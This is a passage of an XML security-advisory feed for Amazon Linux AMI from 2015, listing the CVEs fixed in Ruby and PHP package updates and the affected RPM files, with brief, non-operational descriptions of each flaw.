</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1855" title="" id="CVE-2015-1855" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby21-devel" version="2.1.6" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-devel-2.1.6-1.16.amzn1.x86_64.rpm</filename></package><package name="ruby21-irb" version="2.1.6" release="1.16.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-irb-2.1.6-1.16.amzn1.noarch.rpm</filename></package><package name="rubygems21-devel" version="2.2.3" release="1.16.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-devel-2.2.3-1.16.amzn1.noarch.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.16.amzn1.x86_64.rpm</filename></package><package name="rubygems21" version="2.2.3" release="1.16.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-2.2.3-1.16.amzn1.noarch.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.6" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-debuginfo-2.1.6-1.16.amzn1.x86_64.rpm</filename></package><package name="ruby21" version="2.1.6" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-2.1.6-1.16.amzn1.x86_64.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-io-console-0.4.3-1.16.amzn1.x86_64.rpm</filename></package><package name="ruby21-libs" version="2.1.6" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-libs-2.1.6-1.16.amzn1.x86_64.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-psych-2.0.5-1.16.amzn1.x86_64.rpm</filename></package><package name="ruby21-doc" version="2.1.6" release="1.16.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-doc-2.1.6-1.16.amzn1.noarch.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-io-console-0.4.3-1.16.amzn1.i686.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.6" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-debuginfo-2.1.6-1.16.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.16.amzn1.i686.rpm</filename></package><package name="ruby21" version="2.1.6" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-2.1.6-1.16.amzn1.i686.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-psych-2.0.5-1.16.amzn1.i686.rpm</filename></package><package name="ruby21-libs" version="2.1.6" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-libs-2.1.6-1.16.amzn1.i686.rpm</filename></package><package name="ruby21-devel" version="2.1.6" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-devel-2.1.6-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-533</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-533: medium priority package update for ruby22</title><issued date="2015-05-27 14:06:00" /><updated date="2015-05-27 15:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1855:
1209981:
CVE-2015-1855 ruby: OpenSSL extension hostname matching implementation violates RFC 6125
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1855" title="" id="CVE-2015-1855" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems22-devel" version="2.4.5" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-devel-2.4.5-1.5.amzn1.noarch.rpm</filename></package><package name="ruby22-libs" version="2.2.2" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-libs-2.2.2-1.5.amzn1.x86_64.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.2" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-debuginfo-2.2.2-1.5.amzn1.x86_64.rpm</filename></package><package name="ruby22-devel" version="2.2.2" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-devel-2.2.2-1.5.amzn1.x86_64.rpm</filename></package><package name="ruby22-doc" version="2.2.2" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-doc-2.2.2-1.5.amzn1.noarch.rpm</filename></package><package name="ruby22" version="2.2.2" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-2.2.2-1.5.amzn1.x86_64.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.5.amzn1.x86_64.rpm</filename></package><package name="rubygem22-psych" version="2.0.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-psych-2.0.8-1.5.amzn1.x86_64.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-io-console-0.4.3-1.5.amzn1.x86_64.rpm</filename></package><package name="rubygems22" version="2.4.5" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-2.4.5-1.5.amzn1.noarch.rpm</filename></package><package name="ruby22-irb" version="2.2.2" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-irb-2.2.2-1.5.amzn1.noarch.rpm</filename></package><package name="ruby22-libs" version="2.2.2" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-libs-2.2.2-1.5.amzn1.i686.rpm</filename></package><package name="rubygem22-psych" version="2.0.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-psych-2.0.8-1.5.amzn1.i686.rpm</filename></package><package name="ruby22" version="2.2.2" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-2.2.2-1.5.amzn1.i686.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-io-console-0.4.3-1.5.amzn1.i686.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.2" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-debuginfo-2.2.2-1.5.amzn1.i686.rpm</filename></package><package name="ruby22-devel" version="2.2.2" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-devel-2.2.2-1.5.amzn1.i686.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-534</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-534: important priority package update for php54</title><issued date="2015-06-02 22:20:00" /><updated date="2015-06-02 22:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4026:
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
1223422:
CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character
CVE-2015-4025:
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
1223408:
CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+
CVE-2015-4024:
A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time.
1222485:
CVE-2015-4024 php: multipart/form-data request paring CPU usage DoS
CVE-2015-4022:
An integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code.
1223412:
CVE-2015-4022 php: integer overflow on reading FTP server data leading to heap overflow
1223412:
CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing
CVE-2015-4021:
An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1223425:
CVE-2015-4021 php: memory corruption in phar_parse_tarfile when entry filename starts with NULL
1223425:
CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name
CVE-2015-2326:
1207202:
CVE-2015-2326 pcre: heap buffer overflow in pcre_compile2()
CVE-2015-2325:
1207198:
CVE-2015-2325 pcre: heap buffer overflow in compile_branch()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325" title="" id="CVE-2015-2325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326" title="" id="CVE-2015-2326" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021" title="" id="CVE-2015-4021" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022" title="" id="CVE-2015-4022" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024" title="" id="CVE-2015-4024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025" title="" id="CVE-2015-4025" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026" title="" id="CVE-2015-4026" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-intl" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.41" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.41-1.69.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.41-1.69.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.41" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.41-1.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-535</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-535: medium priority package update for php55</title><issued date="2015-06-02 22:21:00" /><updated date="2015-06-02 22:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4026:
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
1223422:
CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character
CVE-2015-4025:
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
1223408:
CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+
CVE-2015-4024:
A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time.
1222485:
CVE-2015-4024 php: multipart/form-data request paring CPU usage DoS
CVE-2015-4022:
An integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code.
1223412:
CVE-2015-4022 php: integer overflow on reading FTP server data leading to heap overflow
1223412:
CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing
CVE-2015-4021:
An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1223425:
CVE-2015-4021 php: memory corruption in phar_parse_tarfile when entry filename starts with NULL
1223425:
CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021" title="" id="CVE-2015-4021" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022" title="" id="CVE-2015-4022" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024" title="" id="CVE-2015-4024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025" title="" id="CVE-2015-4025" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026" title="" id="CVE-2015-4026" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-mbstring" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.25" release="1.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.25-1.101.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.25" release="1.101.amzn1" epoch="0" 